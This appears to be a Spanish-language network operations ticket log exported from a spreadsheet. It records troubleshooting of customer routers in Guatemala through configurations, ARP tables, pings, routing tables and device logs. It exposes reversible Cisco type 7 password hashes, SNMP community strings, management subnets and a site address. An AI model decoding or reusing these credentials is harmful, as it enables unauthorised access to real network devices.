; -- GENERIC DIRECT IP ENCAPSULATION USER CONFIGURATION --
      IP ADDRESS DHCP-NEGOTIATED
;
      BASE-INTERFACE
; -- BASE INTERFACE CONFIGURATION --
         BASE-INTERFACE CELLULAR1/1 LINK
         BASE-INTERFACE CELLULAR1/1 PROFILE CLARO_TYT
;
      EXIT
;
      DIRECT-IP
; -- DIRECT IP ENCAPSULATOR USER CONFIGURATION --
         ADDRESS DHCP
         ROUTER IGNORE
      EXIT
;
   EXIT
;
   NETWORK TNIP10
; -- IP TUNNEL NET CONFIGURATION --
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      DESCRIPTION "WAN REDUNDANTE"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED DIRECT-IP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE DIRECT-IP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED DIRECT-IP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE DIRECT-IP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.145.41 255.255.255.255
;
   EXIT
;
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.145.41
      ROUTER-ID 10.212.145.41
      ADMINISTRATIVE-DISTANCE
;
      ROUTE 1.2.3.4 255.255.255.255 DIRECT-IP10
      ROUTE 4.3.2.1 255.255.255.255 DIRECT-IP10
      ROUTE 0.0.0.0 0.0.0.0 TNIP10 DISTANCE 160 TRACK NSLA-ADVISOR 20
      ROUTE 0.0.0.0 0.0.0.0 TNIP20 COST 100 DISTANCE 160
;
   EXIT
;
;
   PROTOCOL OSPF
; -- OPEN SPF-BASED ROUTING PROTOCOL CONFIGURATION CONSOLE --
      ENABLE OSPF
;
      AREA 0.0.1.101 DEFAULT
;
      INTERFACE 10.103.15.36 DEFAULT
      INTERFACE 10.103.15.36 AREA 0.0.1.101
      INTERFACE 10.103.15.36 HELLO-INTERVAL 1S
      INTERFACE 10.103.15.36 NETWORK-TYPE BROADCAST
      INTERFACE 10.103.15.36 DEAD-INTERVAL 4S
      INTERFACE 10.103.15.36 ROUTER-PRIORITY 0
;
      INTERFACE 10.212.145.41 DEFAULT
      INTERFACE 10.212.145.41 AREA 0.0.1.101
;
      INTERFACE 10.233.81.121 DEFAULT
      INTERFACE 10.233.81.121 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.103.15.1 YES
;
   EXIT
;
;
;
   PROTOCOL SNMP
; -- SNMP USER CONFIGURATION --
      COMMUNITY NM15SNMPRO SUBNET 10.255.24.144 255.255.255.248
      COMMUNITY NM15SNMPRO SUBNET 190.148.15.192 255.255.255.240
;
      TRAP SENDING-PARAMETERS REACHABILITY-CHECKING IP-ROUTE
      TRAP SENDING-PARAMETERS FORMAT STANDARD
   EXIT
;
;
   FEATURE BANDWIDTH-RESERVATION
; -- BANDWIDTH RESERVATION USER CONFIGURATION --
      NETWORK ETHERNET0/0
         ENABLE
         CLASS CONTROL 100 REAL-TIME
;
         CLASS LOCAL 10
;
         CLASS DEFAULT 40
         CLASS DEFAULT RATE-LIMIT 1024 1536 4096
;
         RATE-LIMIT 1024 1536 4096
      EXIT
;
   EXIT
;
   FEATURE NSM
; -- NETWORK SERVICE MONITOR CONFIGURATION --
      OPERATION 2
; -- NSM OPERATION CONFIGURATION --
         TYPE ECHO IPICMP 1.2.3.4
         FREQUENCY 3
         SOURCE-IPADDR 10.218.51.24
         TIMEOUT 1000
      EXIT
;
      SCHEDULE 2 LIFE FOREVER
      SCHEDULE 2 START-TIME NOW
   EXIT
;
   FEATURE NSLA
; -- FEATURE NETWORK SERVICE LEVEL ADVISOR --
      ENABLE
;
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2
      FILTER 20 DESCRIPTION SONDA-CENTRAL-2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NO CIPHERS ARCFOUR128
         NO CIPHERS ARCFOUR256
         NO CIPHERS ARCFOUR
         NO MACS HMAC-MD5
         NO MACS HMAC-RIPEMD160
         NO MACS HMAC-SHA1-96
         NO MACS HMAC-MD5-96
         ENABLE
      EXIT
;
   EXIT
;
;
   DUMP-COMMAND-ERRORS
   END
CC_TYT_GT_ATM1492 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
08-4F-0A-C8-66-9F     10.103.15.1      236
00-A0-26-C6-50-C1     10.103.15.5      75
00-A0-26-C6-56-C9     10.103.15.6      75
00-A0-26-C6-49-A1     10.103.15.7      75
00-A0-26-C6-54-CD     10.103.15.8      75
00-A0-26-C6-55-11     10.103.15.9      75
00-A0-26-C6-56-C1     10.103.15.11     75
00-A0-26-C6-56-25     10.103.15.13     75
00-A0-26-C6-5A-B5     10.103.15.14     75
00-A0-26-C6-4F-9D     10.103.15.15     75
00-A0-26-C6-51-5D     10.103.15.16     75
00-A0-26-C6-57-E9     10.103.15.17     75
00-A0-26-C6-4F-3D     10.103.15.18     75
00-A0-26-C6-48-FD     10.103.15.19     75
00-A0-26-C6-4B-89     10.103.15.20     75
00-A0-26-C6-5C-E5     10.103.15.23     75
00-A0-26-C6-57-89     10.103.15.24     75
00-A0-26-C6-5E-F9     10.103.15.25     75
00-A0-26-C6-57-BD     10.103.15.27     75
00-A0-26-C6-55-4D     10.103.15.29     75
CC_TYT_GT_ATM1492 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
D4-6E-0E-00-B6-05     10.233.81.122    239
CC_TYT_GT_ATM1492 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
CELLULAR0/0  DOWN
CELLULAR0/1  DOWN
CELLULAR0/2  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
CELLULAR1/2  DOWN
WLAN0/0  DOWN
DIRECT-IP10  UP
TNIP10  UP
TNIP20  DOWN
LOOPBACK5  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.81.121/30
ETHERNET0/1        10.103.15.36/25
DIRECT-IP10        DHCP-NEGOTIATED - 10.218.51.24/32
TNIP10             UNNUMBERED - ADDRESS FROM DIRECT-IP10 (10.218.51.24)
TNIP20             UNNUMBERED - ADDRESS FROM DIRECT-IP10 (10.218.51.24)
LOOPBACK5          10.212.145.41/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.145.41
ROUTER-ID           10.212.145.41
GLOBAL-ADDRESS      10.212.145.41
CC_TYT_GT_ATM1492 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
======================================
..:: NETWORK STATUS ::..
======================================
	SIM STATUS: OK
	REGISTRATION STATE: REGISTERED
	PUBLIC LAND MOBILE NETWORK CODE: 70401
	PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
	NETWORK TECHNOLOGY CURRENTLY IN USE: WCDMA
	CURRENT SERVICE DOMAIN REGISTERED: CS/PS (CAPABLE CS/PS)
	CURRENT ROAMING STATUS: OFF
	3GPP LOCATION AREA CODE: 01AA
	3GPP CELL ID: 00D248C0
	RADIO BAND WCDMAPCS1900
	CHANNEL 9705
	WCDMA PRIMARY SCRAMBLING CODE (PSC): 007F
	WCDMA HIGH-SPEED CALL STATUS: NONE
	WCDMA HIGH-SPEED SERVICE INDICATION: HSDPA/HSUPA
	ECIO (DB): -3
	RX LEVEL (DBM): -87
	COVERAGE LEVEL: 3 (***  )
======================================
..:: NETWORK DATA CONNECTION ::..
======================================
    PRIMARY INTERFACE:
	CONNECTION STATUS: CONNECTED
	RADIO ACCESS TECHNOLOGY: WCDMA HSDPA HSUPA
	TRAFFIC CHANNEL STATUS: ACTIVE
	UPLINK FLOW CONTROL: DEACTIVATED
	MAX. TX CHANNEL RATE (BPS): 2048000
	MAX. RX CHANNEL RATE (BPS): 2048000
	IPV4 ADDRESS: 10.218.51.24
	IPV4 MASK: 255.255.255.240
	IPV4 GATEWAY: 10.218.51.25
	IPV4 PRIMARY DNS: 216.230.147.90
	IPV4 SECONDARY DNS: 216.230.128.3
CC_TYT_GT_ATM1492 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.103.15.36
  PING 10.103.15.36: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.15.36 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    95 PACKET(S) RECEIVED
    5.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.73
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.15.36
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.15.36/32  DIRECT  0    0                 0.0.0.0         VLANIF10</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PROCEDE A DEJAR EN ETAP PENDIENTE CLIENTE POR PROBLEMAS DE ENERGIA COMERCIAL Y ANTECEDENTES DE LO MISMO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN TRANSFERENCIAS 10.103.15.36
  PING 10.103.15.36: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.15.36 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.73
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.15.36
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.15.36/32  DIRECT  0    0                 0.0.0.0         VLANIF10			</t>
  </si>
  <si>
    <t>F4573904</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL CLIENTE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 2 MINUTOS)
CISCO IOS XE SOFTWARE, VERSION 16.08.01
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (ARMV8EB_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.8.1, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2018 BY CISCO SYSTEMS, INC.
COMPILED TUE 27-MAR-18 10:56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GMG_GT_INTERNET_INCAPIE_ZONA13 UPTIME IS 2 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 4 MINUTES
SYSTEM RETURNED TO ROM BY LOCALSOFT
SYSTEM IMAGE FILE IS "BOOTFLASH:C1100-UNIVERSALK9_IAS.16.08.01.SPA.BIN"
LAST RELOAD REASON: LOCALSOFT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CISCO C1111-4P (1RU) PROCESSOR WITH 1456982K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FGL2346L8J2
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2863103K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4102 BYTES
!
! LAST CONFIGURATION CHANGE AT 22:48:15 GUA SUN MAY 22 2022
!
VERSION 16.8
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_GMG_GT_INTERNET_INCAPIE_ZONA13
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE PASSWORD 7 047B3F512E22181D0D
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
IP DHCP EXCLUDED-ADDRESS 192.168.1.254
!
IP DHCP POOL MERAKI
 NETWORK 192.168.1.0 255.255.255.0
 DEFAULT-ROUTER 192.168.1.1
 DNS-SERVER 8.8.8.8 216.230.147.90
!
!
!
LOGIN BLOCK-FOR 120 ATTEMPTS 5 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
LICENSE UDI PID C1111-4P SN FGL2346L8J2
NO LICENSE SMART ENABLE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PASSWORD 7 000A3651130B190D4B
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 81920000 BC 15360000 BE 30720000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.175.97 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/313900405T/_/
 BANDWIDTH 80000
 IP ADDRESS 10.174.142.212 255.255.255.248
 IP NAT OUTSIDE
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 80000
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 200.6.243.117 255.255.255.252
 IP NAT INSIDE
 LOAD-INTERVAL 30
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
IP NAT POOL MERAKI 200.6.243.117 200.6.243.118 NETMASK 255.255.255.252
IP NAT INSIDE SOURCE LIST 1 POOL MERAKI OVERLOAD
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.174.142.209
!
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 190.148.15.192 0.0.0.15 ANY
 PERMIT IP 10.255.24.144 0.0.0.7 ANY
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
 PERMIT IP 192.168.0.0 0.0.255.255 ANY
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 1 PERMIT 192.168.1.0 0.0.0.255
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY C!5C0 RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY CISC0 RO
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_AVENIDA INCAPIE 14-71 ZONA 13 GUATEMALA
!
!
CONTROL-PLAN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LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
LINE VTY 5 15
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
WSMA AGENT EXEC
!
WSMA AGENT CONFIG
!
WSMA AGENT FILESYS
!
WSMA AGENT NOTIFY
!
!
END
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 46 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 46 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 50 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
MAY 23 04:47:57.151: %CMLIB-6-THROUGHPUT_VALUE: R0/0: CMAND: THROUGHPUT LICENSE FOUND, THROUGHPUT SET TO 50000 KBPS
*MAY 23 04:48:04.356: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 23 04:48:04.359: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LSMPI0, CHANGED STATE TO UP
*MAY 23 04:48:04.408: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EOBC0, CHANGED STATE TO UP
*MAY 23 04:48:04.408: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LIIN0, CHANGED STATE TO UP
*MAY 23 04:48:04.955: %ONEP_BASE-6-SS_ENABLED: ONEP: SERVICE SET BASE WAS ENABLED BY DEFAULT
*MAY 23 04:48:09.064: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-3102742172 HAS BEEN GENERATED OR IMPORTED
*MAY 23 04:48:11.946: %SYS-2-PRIVCFG_DECRYPT: SUCCESSFULLY APPLY THE PRIVATE CONFIG FILE
*MAY 22 22:48:11.995 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 04:48:11 UTC MON MAY 23 2022 TO 22:48:11 GUA SUN MAY 22 2022, CONFIGURED FROM CONSOLE BY VTY0.
*MAY 22 22:48:12.123 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 22 22:48:12.433 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 22 22:48:12.467 GUA: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/0, INTERFACES DISABLED
*MAY 22 22:48:12.467 GUA: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/1, INTERFACES DISABLED
*MAY 22 22:48:12.477 GUA: %SPA_OIR-6-OFFLINECARD: SPA (C1111-2X1GE) OFFLINE IN SUBSLOT 0/0
*MAY 22 22:48:12.486 GUA: %SPA_OIR-6-OFFLINECARD: SPA (C1111-ES-4) OFFLINE IN SUBSLOT 0/1
*MAY 22 22:48:12.492 GUA: %IOSXE_OIR-6-INSCARD: CARD (FP) INSERTED IN SLOT F0
*MAY 22 22:48:12.492 GUA: %IOSXE_OIR-6-ONLINECARD: CARD (FP) ONLINE IN SLOT F0
*MAY 22 22:48:12.495 GUA: %IOSXE_OIR-6-INSCARD: CARD (CC) INSERTED IN SLOT 0
*MAY 22 22:48:12.496 GUA: %IOSXE_OIR-6-ONLINECARD: CARD (CC) ONLINE IN SLOT 0
*MAY 22 22:48:12.674 GUA: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/0
*MAY 22 22:48:12.683 GUA: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/1
*MAY 22 22:48:14.281 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (ARMV8EB_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.8.1, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2018 BY CISCO SYSTEMS, INC.
COMPILED TUE 27-MAR-18 10:56 BY MCPRE
*MAY 22 22:48:14.304 GUA: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
*MAY 22 22:48:14.653 GUA: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-3102742172.SERVER HAS BEEN GENERATED OR IMPORTED
*MAY 22 22:48:15.900 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_INCAPIE_ZONA13 IS UNDERGOING A COLD START
*MAY 22 22:48:17.699 GUA: %SPA_OIR-6-ONLINECARD: SPA (C1111-2X1GE) ONLINE IN SUBSLOT 0/0
*MAY 22 22:48:18.289 GUA: %SPA_OIR-6-ONLINECARD: SPA (C1111-ES-4) ONLINE IN SUBSLOT 0/1
*MAY 22 22:48:19.534 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 22 22:48:20.190 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*MAY 22 22:48:20.312 GUA: %PNP-6-PNP_DISCOVERY_STOPPED: PNP DISCOVERY STOPPED (STARTUP CONFIG PRESENT)
*MAY 22 22:48:23.324 GUA: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED CISCO_IDEVID_SUDI HAS BEEN GENERATED OR IMPORTED
*MAY 22 22:48:23.353 GUA: %PKI-2-NON_AUTHORITATIVE_CLOCK: PKI TIMERS HAVE NOT BEEN INITIALIZED DUE TO NON-AUTHORITATIVE SYSTEM CLOCK. ENSURE SYSTEM CLOCK IS CONFIGURED/UPDATED.
*MAY 22 22:48:25.341 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 22 22:48:25.536 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*MAY 22 22:48:26.339 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 22 22:48:27.468 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*MAY 22 22:48:28.512 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 22 22:50:09.770 GUA: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.174.142.209] [LOCALPORT: 23] AT 22:50:09 GUA SUN MAY 22 2022
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
SHOW CLOCK
*22:50:37.918 GUA SUN MAY 22 2022
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.142.209          2   CCBB.FE24.398C  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.174.142.212          -   3C51.0E69.2300  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.168.1.1             -   3C51.0E69.2374  ARPA   VLAN1
INTERNET  192.168.1.2             0   E0CB.BCA0.7D61  ARPA   VLAN1
INTERNET  200.6.243.117           -   3C51.0E69.2374  ARPA   VLAN1
INTERNET  200.6.243.118           0   INCOMPLETE      ARPA
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/313900405T/_/
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.174.142.212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75.97   YES NVRAM  UP                    UP
VLAN1                  200.6.243.117   YES NVRAM  UP                    UP
CC_GMG_GT_INTERNET_INCAPIE_ZONA13#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.142.212
  PING 10.174.142.212: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.142.212 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.79
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.142.212
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.142.212/32  DIRECT  0    0                 0.0.0.0         VLANIF2205			</t>
  </si>
  <si>
    <t>F4573924</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PORCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL..
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_DEPTAL 10.87.184.29
  PING 10.87.184.29: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.184.29 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.88
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.184.29
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
